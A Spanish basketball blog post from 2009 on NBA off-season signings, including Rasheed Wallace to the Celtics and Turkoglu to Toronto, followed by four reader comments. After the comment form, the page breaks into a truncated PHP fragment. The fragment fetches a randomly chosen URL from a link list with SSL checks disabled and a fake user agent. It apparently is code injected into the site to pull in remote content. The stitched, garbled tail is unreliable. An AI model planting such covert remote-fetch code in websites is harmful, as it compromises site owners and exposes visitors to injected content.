Los Celtics mueven ficha

06 de July de 2009 por TheDeerHunter

Los campeones del año pasado se resisten a desaparecer del nuevo mapa de favoritos diseñado tras los últimos movimientos del verano.

Contrato confirmado el del agente libre Rasheed Wallace a los Celtics a través de la “mid level” (cerca de 6 millones de dólares) por los próximos 2 años. Además, cobra fuerza la posibilidad de hacerse también con los servicios de Grant Hill a través de la bianual con la que ha estado jugando para Phoenix las dos últimas campañas. El fichaje de Sheed, a priori muy bueno para ambas partes, tiene un aspecto negativo y es que al superar con creces el impuesto de lujo la renovación de Glen Davis se antoja harto complicada. Sería una lástima con el gran final de temporada que les ha ofrecido en las ausencias de Garnett y Powe. A pesar del evidente declive físico del hasta hace poco pívot de los Pistons su nuevo papel de secundario en asociación con Perkins y Garnett hace del juego interior de los Celtics uno de los más versátiles, experimentados y competitivos de toda la liga. Unido a la temible línea exterior que todos conocemos los Celtics parecen haber recuperado su estatus de principal candidato al anillo para el próximo curso. Cuanto más si logran el fichaje de Hill.

Como muchos ya sabréis al final será Toronto el destino de Turkoglu. Eso sí, por un pastizal importante de 10,5 kilos durante 5 años. Braguetazo tremendo el que ha pegado el turco, a ver si esto le sirve a los Raptors para cambiar la pésima dinámica del año pasado y, de paso, convencer a Bosh para que no se largue. Ahora se hablaba de un intento por Courney Lee… parece que los responsables técnicos canadienses hayan encontrado la piedra filosofal en el temporadón que se marcó Orlando hasta la final. Los dos fichajes de ala que pedía Calderón a gritos en sus últimas declaraciones.

A colación, los Blazers buscan en David Lee el golpe de efecto que les ha fallado con Turkoglu. Pretenden pagar un pastizal enorme por un suplente de Aldridge. Que alguien me explique en que dirección se mueve ese equipo.

Los Mavs también mantienen su ya tradicional línea de “austeridad” de los últimos años (modo irónico: off) y al pedazo de fichaje de Gortat por la mid-level (le quedará algún jugador a Orlando para la próxima temporada) se une el rumor de los 25 kilakos por 3 años que están dispuestos a gastarse en la renovación del señor Kidd. Si eso es lo que cree Cuban que les hará recuperar la condición de favoritos mal andamos.

Por último, los Spurs ficharán a Marcus Haislip para reforzar su juego interior. Parece que el chaval merece una oportunidad en un equipo acostumbrado a pescar bien en aguas europeas. Eso sí, que se vaya preparando para jugar bastante menos que en Málaga, que allí no tienen a ningún Tim Duncan.

Comenta

4 comentarios a esta entrada

  1. Txusma dice:
    #1

    Nos quedan un par de años de Celtics todavia con el fichaje de Sheed (y mas si se confirma el de Hill). Ahora a ver que pasa con Rondo (q siempre aparecia en todos los rumores). Viendo la media de edad de este equipo, podrian intentar fichar a Kidd o Nash.
    Y sera curioso ver como afecta la llegada de Turkoglu a Calderon. Como se comentaba en otro post, al turco le usta asumir protagonismo y direccion el ataque y si a Calderon le qitas la direccion, q le dejas?

      Citar

  2. Fran Reyes dice:
    #2

    A todo esto… ¿piensa Boston renovar a Glen Davis?

      Citar

  3. portu dice:
    #3

    No olvidemos q si Sheed llega es para ser titular y en el puesto de Perkins, así q éste pasaría al banquillo. Pagarle mucha pasta al 4º pivot del equipo no es muy lógico cuando ya se está pagando luxury tax. Davis se marcó unos buenos playoffs, pero sus limitaciones siguen ahí… dudo q llegue a 2m, no tiene salto, en fin, puede dar unos minutos de calidad desde el banquillo, pero en estas circunstancias es lógico q Boston no pague por ello y q ese rol lo ocupe cualquier FA del montón o incluso Scalabrine…
    Si se lesiona KG, Pierce o Allen (pero sobretodo los 2 primeros) el equipo pierde cualquier opción de disputar el anillo, y no será q esté Scalabrine o G. Davis de titular una diferencia sustancial para hacer q el equipo mantenga el nivel, sería imposible en ambos casos.

      Citar

  4. Jabho dice:
    #4

    El fichaje de Sheed es muy bueno para los C´s e incorporar algo de rotación por fuera también lo sería…. Hill vendría muy bien.

    La liga se está partiendo entre los que gastan para ganar y los que ahorran para el año que viene.

    Big Davis es un buen jugador. Bueno en ambos lados de la cancha. Que mide 2 m? Si, pero es que con 2,10 sería uno de los mejores. Creo que da relevos de mucha calidad. Entiendo que para ser 4º pivot no renueven si sale muy caro, pero como tampoco veo a nadie tirando la casa por la ventana por él espero que lo renueven.

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>